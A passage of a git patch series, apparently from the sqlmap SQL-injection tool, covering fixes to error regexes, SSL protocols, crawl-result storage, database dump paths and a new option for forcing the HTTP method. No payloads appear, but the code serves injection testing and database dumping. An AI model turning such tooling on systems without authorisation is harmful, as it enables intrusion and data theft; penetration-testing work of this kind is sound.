@@ -39,7 +39,7 @@
 
     <!-- Oracle -->
     <dbms value="Oracle">
-        <error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
+        <error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
         <error regexp="Oracle error"/>
         <error regexp="Oracle.*Driver"/>
         <error regexp="Warning.*\Woci_.*"/>

From 4da20679ee6968d3b4036bc48f39bc793b76d8f1 Mon Sep 17 00:00:00 2001
From: Rexikon <Rexikon@users.noreply.github.com>
Date: Wed, 19 Nov 2014 16:36:30 +0100
Subject: [PATCH 151/492] Update httpshandler.py

ssl.PROTOCOL_SSLv3 removed
affecting error: AttributeError: 'module' object has no attribute 'PROTOCOL_SSLv3'
---
 lib/request/httpshandler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index c5c39e8a6..b20dc451a 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -19,7 +19,7 @@ try:
 except ImportError:
     pass
 
-_protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
+_protocols = [ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23]
 
 class HTTPSConnection(httplib.HTTPSConnection):
     """

From ee8b3ee664eefb8093c999b1cc799e5acfc6ed81 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 20 Nov 2014 09:49:04 +0100
Subject: [PATCH 152/492] Patch for an Issue #953

---
 lib/core/dump.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index 6646cc1fd..43a86c740 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -391,7 +391,7 @@ class Dump(object):
             self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
             return
 
-        dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+        dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))))
 
         if conf.dumpFormat == DUMP_FORMAT.SQLITE:
             replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
@@ -399,7 +399,7 @@ class Dump(object):
             if not os.path.isdir(dumpDbPath):
                 os.makedirs(dumpDbPath, 0755)
 
-            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
+            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (normalizeUnicode(unsafeSQLIdentificatorNaming(table)), conf.dumpFormat.lower()))
             appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
             dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
 

From 484fa61afca4c9d00d68a1cc3d4027f0f4170b6d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 20 Nov 2014 15:08:08 +0100
Subject: [PATCH 153/492] Patch for an Issue #954

---
 lib/core/option.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index c8af249a0..72d345e42 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -942,7 +942,7 @@ def _setTamperingFunctions():
 
             try:
                 module = __import__(filename[:-3])
-            except ImportError, msg:
+            except (ImportError, SyntaxError), msg:
                 raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
 
             priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__

From d3551631c4325661c3db3b16e1294231b88bb0c2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 20 Nov 2014 16:10:25 +0100
Subject: [PATCH 154/492] Minor update

---
 lib/core/common.py | 24 +++++++++++-------------
 1 file changed, 11 insertions(+), 13 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 5b302d751..b415477bc 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3479,8 +3479,17 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
                     logger.debug(debugMsg)
                     continue
 
-                target = (url, method, data, conf.cookie, None)
-                retVal.add(target)
+                # flag to know if we are dealing with the same target host
+                _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
+
+                if conf.scope:
+                    if not re.search(conf.scope, url, re.I):
+                        continue
+                elif not _:
+                    continue
+                else:
+                    target = (url, method, data, conf.cookie, None)
+                    retVal.add(target)
     else:
         errMsg = "there were no forms found at the given target URL"
         if raise_:
@@ -3490,17 +3499,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
 
     if addToTargets and retVal:
         for target in retVal:
-            url = target[0]
-
-            # flag to know if we are dealing with the same target host
-            _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
-
-            if conf.scope:
-                if not re.search(conf.scope, url, re.I):
-                    continue
-            elif not _:
-                continue
-
             kb.targets.add(target)
 
     return retVal

From f8a8cbf9a6e77bfb669711355f8951294dda6851 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 20 Nov 2014 16:29:17 +0100
Subject: [PATCH 155/492] Storing crawling results to a temporary file (for
 eventual further processing)

---
 lib/core/option.py   |  1 +
 lib/utils/crawler.py | 37 ++++++++++++++++++++++++++++++++++++-
 2 files changed, 37 insertions(+), 1 deletion(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 72d345e42..822c384a1 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1747,6 +1747,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.reduceTests = None
     kb.stickyDBMS = False
     kb.stickyLevel = None
+    kb.storeCrawlingChoice = None
     kb.storeHashesChoice = None
     kb.suppressResumeInfo = False
     kb.technique = None
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index cb502eca1..4dc7b9d8b 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -5,20 +5,26 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import codecs
 import httplib
+import os
 import re
 import urlparse
+import tempfile
 import time
 
 from lib.core.common import clearConsoleLine
 from lib.core.common import dataToStdout
 from lib.core.common import findPageForms
+from lib.core.common import readInput
+from lib.core.common import safeCSValue
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
+from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import runThreads
 from lib.request.connect import Connect as Request
@@ -143,4 +149,33 @@ def crawl(target):
             logger.warn(warnMsg)
         else:
             for url in threadData.shared.value:
-                kb.targets.add((url, None, None, None, None))
+                kb.targets.add((url, conf.method, None, None, None))
+
+        storeResultsToFile(kb.targets)
+
+def storeResultsToFile(results):
+    if not results:
+        return
+
+    if kb.storeCrawlingChoice is None:
+        message = "do you want to store crawling results to a temporary file "
+        message += "for eventual further processing with other tools [y/N] "
+        test = readInput(message, default="N")
+        kb.storeCrawlingChoice = test[0] in ("y", "Y")
+
+    if kb.storeCrawlingChoice:
+        handle, filename = tempfile.mkstemp(prefix="sqlmapcrawling-", suffix=".csv" if conf.forms else ".txt")
+        os.close(handle)
+
+        infoMsg = "writing crawling results to a temporary file '%s' " % filename
+        logger.info(infoMsg)
+
+        with codecs.open(filename, "w+b", UNICODE_ENCODING) as f:
+            if conf.forms:
+                f.write("URL,POST\n")
+
+            for url, _, data, _, _ in results:
+                if conf.forms:
+                    f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or "")))
+                else:
+                    f.write("%s\n" % url)

From 1a8b58fca65daae27475855f39b379c61a1e38ae Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 20 Nov 2014 16:42:06 +0100
Subject: [PATCH 156/492] Minor update

---
 lib/utils/crawler.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index 4dc7b9d8b..9554a76ca 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -149,7 +149,7 @@ def crawl(target):
             logger.warn(warnMsg)
         else:
             for url in threadData.shared.value:
-                kb.targets.add((url, conf.method, None, None, None))
+                kb.targets.add((url, None, None, None, None))
 
         storeResultsToFile(kb.targets)
 

From 34ce774acdec54398940a0f8df88fb1b1751c68d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 21 Nov 2014 09:39:49 +0100
Subject: [PATCH 157/492] Patch for an Issue #956

---
 lib/request/comparison.py | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/request/comparison.py b/lib/request/comparison.py
index 0966c3695..0be79635e 100644
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -132,8 +132,15 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
             seq1 = seq1[count:]
             seq2 = seq2[count:]
 
-        seqMatcher.set_seq1(seq1)
-        seqMatcher.set_seq2(seq2)
+        while True:
+            try:
+                seqMatcher.set_seq1(seq1)
+                seqMatcher.set_seq2(seq2)
+            except MemoryError:
+                seq1 = seq1[:len(seq1) / 4]
+                seq2 = seq2[:len(seq2) / 4]
+            else:
+                break
 
         ratio = round(seqMatcher.quick_ratio(), 3)
 

From cf2d5fd453683ffc60464ae2d3078beb0eb28838 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 21 Nov 2014 09:41:39 +0100
Subject: [PATCH 158/492] Update for an Issue #431

---
 lib/controller/controller.py |  2 +-
 lib/core/optiondict.py       |  1 +
 lib/parse/cmdline.py         |  3 +++
 lib/request/connect.py       |  3 ++-
 sqlmap.conf                  | 15 +++++++++------
 5 files changed, 16 insertions(+), 8 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 00b64295f..0955230fd 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -269,7 +269,7 @@ def start():
     for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
         try:
             conf.url = targetUrl
-            conf.method = targetMethod
+            conf.method = targetMethod.upper() if targetMethod else targetMethod
             conf.data = targetData
             conf.cookie = targetCookie
             conf.httpHeaders = list(initialHeaders)
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index bbf56fa84..d637aa817 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -23,6 +23,7 @@ optDict = {
                              },
 
             "Request":       {
+                               "method":            "string",
                                "data":              "string",
                                "paramDel":          "string",
                                "cookie":            "string",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 4e100986e..81fade009 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -90,6 +90,9 @@ def cmdLineParser():
         request = OptionGroup(parser, "Request", "These options can be used "
                               "to specify how to connect to the target URL")
 
+        request.add_option("--method", dest="method",
+                           help="Force usage of given HTTP method (e.g. PUT)")
+
         request.add_option("--data", dest="data",
                            help="Data string to be sent through POST")
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 5f1acd2d3..61c627d1e 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -307,7 +307,7 @@ class Connect(object):
                     url = "%s?%s" % (url, get)
                     requestMsg += "?%s" % get
 
-                if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
+                if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
                     post = conf.parameters[PLACE.POST]
 
             elif get:
@@ -634,6 +634,7 @@ class Connect(object):
             auxHeaders = {}
 
         raise404 = place != PLACE.URI if raise404 is None else raise404
+        method = method or conf.method
 
         value = agent.adjustLateValues(value)
         payload = agent.extractPayload(value)
diff --git a/sqlmap.conf b/sqlmap.conf
index 93b2e1569..6a2fad0b8 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -40,31 +40,34 @@ sitemapUrl =
 # These options can be used to specify how to connect to the target URL.
 [Request]
 
+# Force usage of given HTTP method (e.g. PUT).
+method = 
+
 # Data string to be sent through POST.
 data = 
 
-# Character used for splitting parameter values
+# Character used for splitting parameter values.
 paramDel = 
 
 # HTTP Cookie header value.
 cookie = 
 
-# Character used for splitting cookie values
+# Character used for splitting cookie values.
 cookieDel = 
 
-# File containing cookies in Netscape/wget format
+# File containing cookies in Netscape/wget format.
 loadCookies = 
 
-# Ignore Set-Cookie header from response
+# Ignore Set-Cookie header from response.
 # Valid: True or False
 dropSetCookie = False
 
 # HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value
-# at each HTTP request
+# at each HTTP request.
 # sqlmap will also test for SQL injection on the HTTP User-Agent value.
 agent =
 
-# Use randomly selected HTTP User-Agent header value
+# Use randomly selected HTTP User-Agent header value.
 # Valid: True or False
 randomAgent = False
 

From 1fc4d0e3c43e2def340a58d864768a324ccc565d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 21 Nov 2014 10:31:55 +0100
Subject: [PATCH 159/492] Update for an Issue #431

---
 lib/core/option.py     | 11 -----------
 lib/request/connect.py |  6 +++---
 2 files changed, 3 insertions(+), 14 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 822c384a1..a96b49bf5 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1252,16 +1252,6 @@ def _setHTTPAuthentication():
         checkFile(key_file)
         authHandler = HTTPSPKIAuthHandler(key_file)
 
-def _setHTTPMethod():
-    """
-    Check and set the HTTP method to perform HTTP requests through.
-    """
-
-    conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
-
-    debugMsg = "setting the HTTP method to %s" % conf.method
-    logger.debug(debugMsg)
-
 def _setHTTPExtraHeaders():
     if conf.headers:
         debugMsg = "setting extra HTTP headers"
@@ -2330,7 +2320,6 @@ def init():
         _setHTTPCookies()
         _setHTTPReferer()
         _setHTTPUserAgent()
-        _setHTTPMethod()
         _setHTTPAuthentication()
         _setHTTPProxy()
         _setDNSCache()
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 61c627d1e..346350755 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -765,7 +765,7 @@ class Connect(object):
                     retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
                 return retVal
 
-            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
+            page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
             match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
             token = (match.group(2) or match.group(3) or match.group(4)) if match else None
 
@@ -943,7 +943,7 @@ class Connect(object):
             elif kb.nullConnection == NULLCONNECTION.RANGE:
                 auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"
 
-            _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
+            _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))
 
             if headers:
                 if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
@@ -955,7 +955,7 @@ class Connect(object):
 
         if not pageLength:
             try:
-                page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
+                page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
             except MemoryError:
                 page, headers, code = None, None, None
                 warnMsg = "site returned insanely large response"

From f0802c6fb900566ab11f10acf2d9823a8c486b33 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 21 Nov 2014 11:20:54 +0100
Subject: [PATCH 160/492] Update for an Issue #431

---
 lib/controller/checks.py     | 30 +++++++++++++++++++-----------
 lib/controller/controller.py | 30 ++++++++++++++++--------------
 lib/core/option.py           |  6 +++---
 3 files changed, 38 insertions(+), 28 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index fa118f556..29f4ffda3 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -85,6 +85,8 @@ def checkSqlInjection(place, parameter, value):
     # Set the flag for SQL injection test mode
     kb.testMode = True
 
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
     tests = getSortedInjectionTests()
 
     while tests:
@@ -403,7 +405,7 @@ def checkSqlInjection(place, parameter, value):
 
                                 # Perform the test's False request
                                 if not falseResult:
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -414,7 +416,7 @@ def checkSqlInjection(place, parameter, value):
                                 candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet)))
                                 if candidates:
                                     conf.string = candidates[0]
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (place, parameter, title, repr(conf.string).lstrip('u').strip("'"))
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'"))
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -437,7 +439,7 @@ def checkSqlInjection(place, parameter, value):
                                     result = output == "1"
 
                                     if result:
-                                        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
+                                        infoMsg = "%s parameter '%s' is '%s' injectable " % (paramType, parameter, title)
                                         logger.info(infoMsg)
 
                                         injectable = True
@@ -459,7 +461,7 @@ def checkSqlInjection(place, parameter, value):
                                 trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
 
                                 if trueResult:
-                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (place, parameter, title)
+                                    infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title)
                                     logger.info(infoMsg)
 
                                     injectable = True
@@ -495,7 +497,7 @@ def checkSqlInjection(place, parameter, value):
                             reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
 
                             if isinstance(reqPayload, basestring):
-                                infoMsg = "%s parameter '%s' is '%s' injectable" % (place, parameter, title)
+                                infoMsg = "%s parameter '%s' is '%s' injectable" % (paramType, parameter, title)
                                 logger.info(infoMsg)
 
                                 injectable = True
@@ -787,6 +789,8 @@ def heuristicCheckSqlInjection(place, parameter):
 
     origValue = conf.paramDict[place][parameter]
 
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
     prefix = ""
     suffix = ""
 
@@ -812,8 +816,8 @@ def heuristicCheckSqlInjection(place, parameter):
     parseFilePaths(page)
     result = wasLastResponseDBMSError()
 
-    infoMsg = "heuristic (basic) test shows that %s " % place
-    infoMsg += "parameter '%s' might " % parameter
+    infoMsg = "heuristic (basic) test shows that %s parameter " % paramType
+    infoMsg += "'%s' might " % parameter
 
     def _(page):
         return any(_ in (page or "") for _ in FORMAT_EXCEPTION_STRINGS)
@@ -861,9 +865,11 @@ def heuristicCheckSqlInjection(place, parameter):
     payload = agent.payload(place, parameter, newValue=payload)
     page, _ = Request.queryPage(payload, place, content=True, raise404=False)
 
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
     if value in (page or ""):
-        infoMsg = "heuristic (XSS) test shows that %s " % place
-        infoMsg += "parameter '%s' might " % parameter
+        infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
+        infoMsg += "'%s' might " % parameter
         infoMsg += "be vulnerable to XSS attacks"
         logger.info(infoMsg)
 
@@ -885,7 +891,9 @@ def checkDynParam(place, parameter, value):
     dynResult = None
     randInt = randomInt()
 
-    infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
+    infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
     logger.info(infoMsg)
 
     try:
@@ -893,7 +901,7 @@ def checkDynParam(place, parameter, value):
         dynResult = Request.queryPage(payload, place, raise404=False)
 
         if not dynResult:
-            infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
+            infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
             logger.info(infoMsg)
 
             randInt = randomInt()
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 0955230fd..a6d89e6ca 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -311,13 +311,13 @@ def start():
                 if conf.forms:
                     message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
                 else:
-                    message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
+                    message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
 
                 if conf.cookie:
                     message += "\nCookie: %s" % conf.cookie
 
                 if conf.data is not None:
-                    message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
+                    message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
 
                 if conf.forms:
                     if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
@@ -327,13 +327,13 @@ def start():
                     test = readInput(message, default="Y")
 
                     if not test or test[0] in ("y", "Y"):
-                        if conf.method == HTTPMETHOD.POST:
-                            message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
+                        if conf.method != HTTPMETHOD.GET:
+                            message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
                             conf.data = readInput(message, default=conf.data)
                             conf.data = _randomFillBlankFields(conf.data)
                             conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
 
-                        elif conf.method == HTTPMETHOD.GET:
+                        else:
                             if targetUrl.find("?") > -1:
                                 firstPart = targetUrl[:targetUrl.find("?")]
                                 secondPart = targetUrl[targetUrl.find("?") + 1:]
@@ -428,6 +428,8 @@ def start():
 
                     paramDict = conf.paramDict[place]
 
+                    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
                     for parameter, value in paramDict.items():
                         if not proceed:
                             break
@@ -439,7 +441,7 @@ def start():
                         if paramKey in kb.testedParams:
                             testSqlInj = False
 
-                            infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif parameter in conf.testParameter:
@@ -448,13 +450,13 @@ def start():
                         elif parameter == conf.rParam:
                             testSqlInj = False
 
-                            infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif parameter in conf.skip:
                             testSqlInj = False
 
-                            infoMsg = "skipping %s parameter '%s'" % (place, parameter)
+                            infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif parameter == conf.csrfToken:
@@ -467,18 +469,18 @@ def start():
                         elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
                             testSqlInj = False
 
-                            infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
+                            infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
                         elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
                             check = checkDynParam(place, parameter, value)
 
                             if not check:
-                                warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
+                                warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                                 logger.warn(warnMsg)
 
                             else:
-                                infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
+                                infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                                 logger.info(infoMsg)
 
                         kb.testedParams.add(paramKey)
@@ -488,11 +490,11 @@ def start():
 
                             if check != HEURISTIC_TEST.POSITIVE:
                                 if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
-                                    infoMsg = "skipping %s parameter '%s'" % (place, parameter)
+                                    infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
                                     logger.info(infoMsg)
                                     continue
 
-                            infoMsg = "testing for SQL injection on %s " % place
+                            infoMsg = "testing for SQL injection on %s " % paramType
                             infoMsg += "parameter '%s'" % parameter
                             logger.info(infoMsg)
 
@@ -515,7 +517,7 @@ def start():
                                     paramKey = (conf.hostname, conf.path, None, None)
                                     kb.testedParams.add(paramKey)
                             else:
-                                warnMsg = "%s parameter '%s' is not " % (place, parameter)
+                                warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
                                 warnMsg += "injectable"
                                 logger.warn(warnMsg)
 
diff --git a/lib/core/option.py b/lib/core/option.py
index a96b49bf5..d0a3af309 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -285,7 +285,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                 line = line.strip('\r')
                 match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
 
-                if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
+                if len(line) == 0 and method and method != HTTPMETHOD.GET and data is None:
                     data = ""
                     params = True
 
@@ -1780,11 +1780,11 @@ def _useWizardInterface():
         message = "Please enter full target URL (-u): "
         conf.url = readInput(message, default=None)
 
-    message = "POST data (--data) [Enter for None]: "
+    message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
     conf.data = readInput(message, default=None)
 
     if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
-        warnMsg = "no GET and/or POST parameter(s) found for testing "
+        warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
         warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
         if not conf.crawlDepth and not conf.forms:
             warnMsg += "Will search for forms"

From 5c182a0ec409ddedcaf940fd5099a29319ac464b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 21 Nov 2014 11:33:57 +0100
Subject: [PATCH 161/492] Update for an Issue #431

---
 lib/controller/controller.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index a6d89e6ca..37dcc6e25 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -126,8 +126,8 @@ def _selectInjection():
         kb.injection = kb.injections[index]
 
 def _formatInjection(inj):
-    data = "Place: %s\n" % inj.place
-    data += "Parameter: %s\n" % inj.parameter
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
+    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
 
     for stype, sdata in inj.data.items():
         title = sdata.title
@@ -146,7 +146,7 @@ def _formatInjection(inj):
             vector = "%s%s" % (vector, comment)
